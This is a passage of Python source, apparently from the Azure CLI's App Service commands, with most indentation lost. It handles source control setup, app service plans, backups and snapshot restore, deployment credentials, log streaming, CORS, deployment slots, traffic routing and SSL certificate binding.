app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
        webapp_list = None if test is None else list_webapp(cmd, resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
        raise CLIError('The following parameters are of no use when cd_project_url is None: ' +
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework, ' +
                       'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
            # for non-server errors (i.e. not 50x), just throw; otherwise retry up to 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
    the command will clean up the existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers are not yet supported in App Service Environments')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the API's parameter naming is odd; we have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
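# Illustrative examples for the parser below (not executed): _parse_frequency('7d') returns
# (7, FrequencyUnit.day) and _parse_frequency('12h') returns (12, FrequencyUnit.hour); any other
# suffix, or a non-numeric prefix, raises CLIError.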
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num <= 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
from azure.cli.core.profiles import ResourceType
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
from azure.cli.core.profiles import ResourceType
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
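# Illustrative example (host shape assumed): the format below typically yields something like
# 'https://<publishing-user>@<app-name>.scm.azurewebsites.net/<app-name>.git'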
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials. (Note: all webapps in your subscription will be impacted.)
'''
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
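# (e.g. an attribute parsed as '@publishMethod' becomes 'publishMethod' in the output dict)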
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
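# illustrative shape (host assumed): 'https://<app-name>.scm.azurewebsites.net/docker/hook'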
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config is currently not in use; it will be implemented later.
# Tracked as issue #4764 on GitHub
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 MB max log size, 3-day retention. These values are hard-coded to match the portal defaults.
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
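# Illustrative example (host name assumed): for default_host_name 'mysite.azurewebsites.net' and
# distribution ['staging=25'], the loop below adds a RampUpRule with
# action_host_name='mysite-staging.azurewebsites.net', reroute_percentage=25.0 and name='staging'.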
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode() for stdout encodings that do not support 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file):
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get')
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
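# Illustrative example (values assumed): _generate_cert_name('ABC123', '', 'westus', 'myRG')
# returns 'ABC123__westus_myRG' (the hosting environment segment is empty for non-ASE apps).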
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host names like 'admin.foo.com', 'logs.foo.com', etc.
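# Illustrative example (not executed): with hostnames_from_cert=['*.foo.com'] and
# hostnames_in_webapp=['admin.foo.com', 'logs.foo.com', 'bar.com'], the result is
# {'admin.foo.com', 'logs.foo.com'}.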
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class that handles runtime stacks in formats like 'node|6.1' or 'php|5.5'
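# Illustrative sketch (version values assumed, shapes taken from _load_stacks below):
# resolve('node|10.14') on a Windows helper would return something like
#   {'displayName': 'node|10.14',
#    'configs': {'WEBSITE_NODE_DEFAULT_VERSION': '10.14.1'},
#    'setter': _StackRuntimeHelper.update_site_appsettings}
# while Linux entries carry only 'displayName' and 'setter'.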
class _StackRuntimeHelper(object):
def __init__(self, client, linux=False):
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
